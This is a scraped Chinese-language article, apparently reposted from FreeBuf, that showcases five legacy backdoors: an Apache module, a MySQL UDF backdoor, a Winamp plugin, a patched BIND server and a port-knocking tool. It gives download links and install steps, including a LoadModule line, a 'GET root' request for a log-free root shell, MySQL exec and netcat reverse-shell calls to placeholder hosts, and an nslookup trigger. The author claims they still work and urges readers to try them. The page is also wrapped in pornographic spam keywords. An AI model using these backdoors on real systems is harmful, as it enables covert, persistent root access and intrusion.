成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

老式后門之美:五種復古遠程控制工具(含下載)

安全 黑客攻防 數據安全
本文介紹了5種遠程控制工具(Remote Administration Tools)RAT ,又稱“后門”,這完全是根據作者個人喜好挑選的。這是我進行合法滲透測試時所使用的工具,它們對于驗證滲透的持久性與測量防御手段的有效性提供了重要的幫助。

目前,高級的rootkit技術可以幫助你在滲透中拿到一個shell后進行持久性控制。此外,還有供應商故意提供了一些植入后門,但那就是截然不同的故事了。盡管各式花樣翻新的技術與代碼層出不窮,可你還記得曾經用過的那些后門嗎?

本文介紹了5種遠程控制工具(Remote Administration Tools)RAT ,又稱“后門”,這完全是根據作者個人喜好挑選的。這是我進行合法滲透測試時所使用的工具,它們對于驗證滲透的持久性與測量防御手段的有效性提供了重要的幫助。

1.mod_rootme——Apache模塊后門(2004)

“mod_rootme是一個非常酷的模塊,它可以在Apache中安裝一個后門,你只需要進行一個簡單的GET請求,就可以拿到一個root權限的shell,并且在系統中沒有任何日志記錄。”

作為***的工具之一,你只需要執行一個簡單的make命令來編譯共享庫,將它復制到模塊目錄,在httpd.conf中寫入入“LoadModule rootme2_module /usr/lib/apache2/modules/mod_rootme2.so”,然后使用‘apachetl stop;apachectl start’重啟httpd后臺進程。之后,通過“GET root”命令你就得到了一個root權限的shell。

下載:https://packetstormsecurity.com/files/33652/mod_rootme-0.3.tgz.html

老式后門之美:五種復古遠程控制工具(含下載)

2.raptor_winudf.sql —— MySQL UDF后門(2004-2006)

“這是一個基于UDF(用戶定義函數)機制的MySQL后門工具。可以用它來產生一個反彈shell(netcat UDF監聽80端口)或者執行一條系統命令(exec UDF)。”

對于這個后門,你可以使用一個簡單的命令‘#mysql –h x.x.x.x < raptor_winudf.sql’將后門作為一個用戶定義函數注入到MySQL中。這樣你便可以從MySQL shell執行‘mysql > select exec('ipconfig > c:\\out.txt');’命令。

這個反彈shell實現了一個有趣的功能,可以使用命令‘mysql> select netcat('y.y.y.y');’來調用,之后就會發送一個交互式shell在指定的主機(y.y.y.y)的80端口上。

下載 (Win32): http://www.0xdeadbeef.info/exploits/raptor_winudf.tgz

下載 (Linux): http://www.0xdeadbeef.info/exploits/raptor_udf2.c

截圖來源:infamoussyn

老式后門之美:五種復古遠程控制工具(含下載)

3. get_wbkdr.dll插件——Winamp播放器后門(2006)

“wbkdr是非常著名的高保真音樂播放器軟件Winamp后門的一個POC,它利用了插件接口,在24501端口中調用cmd.exe。”

下載:https://packetstormsecurity.com/files/53268/wbkdr.zip.html

老式后門之美:五種復古遠程控制工具(含下載)

4.BIND反彈shell后門(2005)

BIND是世界上***的DNS服務器軟件之一。這個后門使用了BIND未發布的補丁,是我的一個來自阿根廷的朋友開發的。基本上,需要你以root用戶的身份來打補丁、編譯以及運行服務。一旦運行,用‘nslookup backdoorpassword:x.x.x.x:port target_DNS_server’ 發送一個DNS請求,將會在主機x.x.x.x的給定端口上觸發一個反彈shell。

老式后門之美:五種復古遠程控制工具(含下載)

5.Knock-out—— 基于端口敲門(port-knocking)的后門

這是我使用數據包嗅探庫libpcap(服務器)和數據包構造庫libnet(客戶端)制作的后門。我運用了端口敲門技術,它可以是一個綁定端口的shell也可以是一個反彈型的shell。服務器與客戶端使用相同的配置文件來決定使用哪些端口以及發送每個網絡包時間所需要的時間差。Knock-out支持TCP和UDP,并且最近在Linux主機中仍然可以工作(測試系統Ubuntu Server 14.04)。

下載:https://packetstormsecurity.com/files/52834/knock-out.tar.gz.html

老式后門之美:五種復古遠程控制工具(含下載)

 

作者寄語

這些后門至今仍然有效,或許你可以嘗試一下。同時,我鼓勵大家與我們分享你見過的有趣的后門、你喜歡的后門、你用過的最特別的后門以及你所鐘愛的后門。別忘了在Twitter上使用#oldschoolbackdoors(老式后門)標簽!

責任編輯:藍雨淚 來源: FreeBuf
相關推薦

2010-09-26 10:41:31

2014-02-20 10:49:27

虛擬桌面遠程控制

2014-08-22 09:08:23

遠程控制木馬

2014-10-14 18:03:11

遠程監控

2009-07-22 19:06:37

2013-12-10 18:16:31

2014-01-07 17:21:27

遠程控制

2014-01-15 15:01:54

遠程控制

2011-08-08 15:57:43

2013-12-20 16:43:33

遠程開機關機

2023-09-18 14:41:56

2013-09-09 11:12:06

網絡人遠程控制軟件

2014-01-17 17:33:32

遠程開機

2010-10-25 09:23:51

2012-04-10 14:57:30

Windows桌面遠程控制Linux

2010-01-08 14:35:58

2013-07-25 09:42:00

遠程桌面連接遠程控制

2013-09-25 14:47:15

遠程控制SDK

2013-10-14 10:19:26

2013-10-21 18:30:19

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 一级片av | 欧美午夜精品 | 丁香婷婷综合激情五月色 | 亚洲a在线视频 | 精品国产1区2区3区 在线国产视频 | 精品二三区| 国产区免费视频 | 黄网站在线观看 | 亚洲精品在线观看网站 | 午夜精品一区二区三区在线 | 99精品久久久久久中文字幕 | 国产综合av | 欧美黄色网络 | 亚洲第一网站 | 免费精品一区 | 国产视频在线观看一区二区三区 | 紧缚调教一区二区三区视频 | 亚洲视频一区在线 | 自拍偷拍第一页 | 中文字幕日韩欧美 | 99久久精品免费看国产四区 | 一级欧美 | 免费看大片bbbb欧美 | 日韩精品一区二区三区中文字幕 | av在线一区二区三区 | 给我免费的视频在线观看 | 中文字幕av亚洲精品一部二部 | 国产三级网站 | 91原创视频在线观看 | 91精品国产乱码久久蜜臀 | caoporn视频| 成人亚洲精品 | 国产黄色网址在线观看 | 色黄爽 | 中文字幕蜜臀 | 久草视频观看 | 国产精品不卡 | 理论片87福利理论电影 | 国产一级影片 | 羞羞的视频免费观看 | 欧美爱爱视频 |